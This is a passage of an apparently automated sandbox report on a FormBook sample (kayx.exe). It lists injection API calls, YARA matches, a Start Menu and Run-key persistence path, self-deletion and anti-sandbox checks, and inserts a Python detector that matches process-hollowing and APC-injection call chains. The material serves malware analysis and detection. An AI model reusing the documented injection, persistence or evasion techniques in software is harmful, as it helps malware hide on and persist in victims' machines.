Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B4A NtCreateFile, 17_1_00417B4A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417BE2 NtCreateFile, 17_1_00417BE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B8A NtCreateFile, 17_1_00417B8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417CBF NtClose, 17_1_00417CBF
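The native functions listed above (NtUnmapViewOfSection in the process 1 stage; NtCreateProcessEx, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtMapViewOfSection and NtResumeThread in process 17) are the primitives behind the "Creates a process in suspended mode", "Sample uses process hollowing technique", "Modifies the context of a thread in another process" and "Queues an APC in another process" signatures. The following is an added example, not part of the Joe Sandbox report, of how a detection engineer would express those two injection chains as ordered call sequences and match them against an API trace. The trace is constructed for the example in a simple key=value line format (it is not Joe Sandbox's log format); its process numbers follow the report's roles (1 for the initial kayx.exe stage, 17 for the hollowed kayx.exe, 18 for explorer.exe), and the chain definitions are this example's own.

```python
from collections import defaultdict

# Constructed API trace (not Joe Sandbox output). Process numbers follow the
# report: 1 = initial kayx.exe stage, 17 = hollowed kayx.exe, 18 = explorer.exe.
# Processes 5 and 6 are a benign control (a debugger-style read, no injection).
TRACE = """\
pid=1 api=CreateProcessW target=17 flags=CREATE_SUSPENDED
pid=1 api=NtUnmapViewOfSection target=17
pid=1 api=NtAllocateVirtualMemory target=17 protect=PAGE_EXECUTE_READWRITE
pid=1 api=NtWriteVirtualMemory target=17
pid=1 api=NtSetContextThread target=17
pid=1 api=NtResumeThread target=17
pid=17 api=NtOpenProcess target=18
pid=17 api=NtCreateSection target=17
pid=17 api=NtMapViewOfSection target=18
pid=17 api=NtQueueApcThread target=18
pid=17 api=NtResumeThread target=18
pid=5 api=NtOpenProcess target=6
pid=5 api=NtReadVirtualMemory target=6
"""


def parse_trace(text: str) -> list:
    """Turn 'key=value key=value' lines into dicts, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(tok.split("=", 1) for tok in line.split()))
    return events


# Each chain is an ordered list of predicates that must all match, in order,
# within one (source pid, target pid) pair. Unrelated calls in between are
# allowed, which is what makes this a subsequence match rather than an exact one.
PATTERNS = {
    "process hollowing": [
        lambda e: e["api"].startswith("CreateProcess")
        and "CREATE_SUSPENDED" in e.get("flags", ""),
        lambda e: e["api"] == "NtUnmapViewOfSection",
        lambda e: e["api"] == "NtWriteVirtualMemory",
        lambda e: e["api"] == "NtSetContextThread",
        lambda e: e["api"] == "NtResumeThread",
    ],
    "APC injection": [
        lambda e: e["api"] in ("NtMapViewOfSection", "NtWriteVirtualMemory"),
        lambda e: e["api"] == "NtQueueApcThread",
        lambda e: e["api"] == "NtResumeThread",
    ],
}


def detect_injection(events: list) -> list:
    """Return sorted (chain name, source pid, target pid) for every completed chain.
    Calls a process makes on itself are ignored; only cross-process pairs count."""
    by_pair = defaultdict(list)
    for e in events:
        if "target" in e and e["target"] != e["pid"]:
            by_pair[(e["pid"], e["target"])].append(e)
    findings = []
    for (src, dst), seq in by_pair.items():
        for name, steps in PATTERNS.items():
            step = 0
            for e in seq:
                if step < len(steps) and steps[step](e):
                    step += 1
            if step == len(steps):
                findings.append((name, int(src), int(dst)))
    return sorted(findings)


if __name__ == "__main__":
    for name, src, dst in detect_injection(parse_trace(TRACE)):
        print(f"{name}: pid {src} -> pid {dst}")
```

On the constructed trace this reports process hollowing from 1 into 17 and APC injection from 17 into 18, and nothing for the 5/6 pair, which only reads memory. Two simplifications matter when adapting this to real telemetry: the target of CreateProcess is only known from its return value, so a real detector joins the child PID from the call's output rather than reading it from the call's arguments as done here, and the hollowing chain should also accept NtCreateProcessEx plus NtMapViewOfSection as the "write" step, since FormBook's own list above shows it has both the section-mapping and the WriteVirtualMemory routes available.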
Detected potential crypto function
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_01850C1C 1_2_01850C1C
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C42938 1_2_05C42938
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C46D00 1_2_05C46D00
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C46D10 1_2_05C46D10
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C426C0 1_2_05C426C0
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C426B1 1_2_05C426B1
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C42987 1_2_05C42987
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00401030 17_2_00401030
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041B091 17_2_0041B091
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408A30 17_2_00408A30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402D87 17_2_00402D87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402D90 17_2_00402D90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041BE80 17_2_0041BE80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041BE8A 17_2_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041C6AB 17_2_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041C7F2 17_2_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402FB0 17_2_00402FB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED28EC 17_2_00ED28EC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED20A8 17_2_00ED20A8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B090 17_2_00E1B090
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EDE824 17_2_00EDE824
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1002 17_2_00EC1002
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0F900 17_2_00E0F900
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED22AE 17_2_00ED22AE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFA2B 17_2_00EBFA2B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC03DA 17_2_00EC03DA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECDBD2 17_2_00ECDBD2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3EBB0 17_2_00E3EBB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AB40 17_2_00E2AB40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2B28 17_2_00ED2B28
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECD466 17_2_00ECD466
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1841F 17_2_00E1841F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED25DD 17_2_00ED25DD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1D55 17_2_00ED1D55
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E00D20 17_2_00E00D20
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2D07 17_2_00ED2D07
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2EF7 17_2_00ED2EF7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E26E30 17_2_00E26E30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECD616 17_2_00ECD616
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1FF1 17_2_00ED1FF1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EDDFCE 17_2_00EDDFCE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00401030 17_1_00401030
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041B091 17_1_0041B091
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00408A30 17_1_00408A30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402D87 17_1_00402D87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402D90 17_1_00402D90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041BE80 17_1_0041BE80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041BE8A 17_1_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041C6AB 17_1_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041C7F2 17_1_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402FB0 17_1_00402FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Code function: 19_2_01060C1C 19_2_01060C1C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\kayx.exe Code function: String function: 00419A40 appears 38 times
Source: C:\Users\user\Desktop\kayx.exe Code function: String function: 00E0B150 appears 54 times
Sample file is different than original file name gathered from version info
Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
Source: kayx.exe Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Yara signature match
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: kayx.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: firefoxe.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kayx.exe, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: firefoxe.exe.1.dr, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.kayx.exe.ec0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.kayx.exe.ec0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.kayx.exe.200000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.kayx.exe.200000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.0.kayx.exe.2c0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.kayx.exe.2c0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 17.0.kayx.exe.400000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 19.0.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 19.2.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@14/3@4/2
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
Source: C:\Users\user\Desktop\kayx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Users\user\Desktop\kayx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: kayx.exe Virustotal: Detection: 34%
Source: kayx.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\kayx.exe File read: C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32
Source: C:\Users\user\Desktop\kayx.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kayx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: kayx.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kayx.exe Unpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_0185A9A1 push edx; iretd 1_2_0185A9A2
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C48CE3 push E808AB5Eh; retf 1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C48C8D push E808AB5Eh; retf 1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041AD55 push eax; ret 17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041ADA2 push eax; ret 17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041ADAB push eax; ret 17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041AE0C push eax; ret 17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414EC5 push CFF27278h; ret 17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414E85 push CFF27278h; ret 17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00414740 push cs; iretd 17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041478D push cs; iretd 17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E5D0D1 push ecx; ret 17_2_00E5D0E4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041AD55 push eax; ret 17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041ADA2 push eax; ret 17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041ADAB push eax; ret 17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041AE0C push eax; ret 17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414EC5 push CFF27278h; ret 17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414E85 push CFF27278h; ret 17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00414740 push cs; iretd 17_1_00414779
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041478D push cs; iretd 17_1_00414779
Source: initial sample Static PE information: section name: .text entropy: 7.94131868162

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe

Boot Survival:

Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
Source: C:\Users\user\Desktop\kayx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\kayx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\kayx.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
